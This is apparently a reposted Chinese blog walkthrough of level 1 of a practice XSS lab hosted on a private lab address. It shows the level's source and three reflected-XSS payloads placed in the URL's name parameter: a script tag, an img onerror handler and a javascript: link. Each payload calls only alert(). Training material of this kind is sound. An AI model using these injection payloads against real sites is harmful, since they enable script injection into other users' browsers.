标签：xss http name 199.153 level1 php 第一关 通关

每一题都先检查源码，先从源码中找问题，再看URL

1.第一关

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<h2 align=center>欢迎用户</h2><center><img src=level1.png></center>
<h3 align=center>payload的长度:0</h3></body>
</html>　

首先查看源码有没有接入点，发现没有接入点，对此再看url，看从url中能否找到突破点！

http://192.168.199.153/xss/level1.php?name=test

从此url中进行测试，把name=test修改一下看是否可以修改

http://192.168.199.153/xss/level1.php?name=123

如此，找到突破点，直接输入：

第一种：script标签

　　　　http://192.168.199.153/xss/level1.php?name=<script>alert()</script>

第二种：img标签

　　　　http://192.168.199.153/xss/level1.php?name=<img src=1 one rror=alert()>

其中的onerror=alert（）  也可以使用 onclick=alert（）、onmouseout=alert()

第三种：超链接<a>标签

　　　　http://192.168.199.153/xss/level1.php?name=<a href="javascript:alert()">点击</a>

标签：xss,http,name,199.153,level1,php,第一关,通关
来源： https://www.cnblogs.com/ajdbk/p/16420841.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。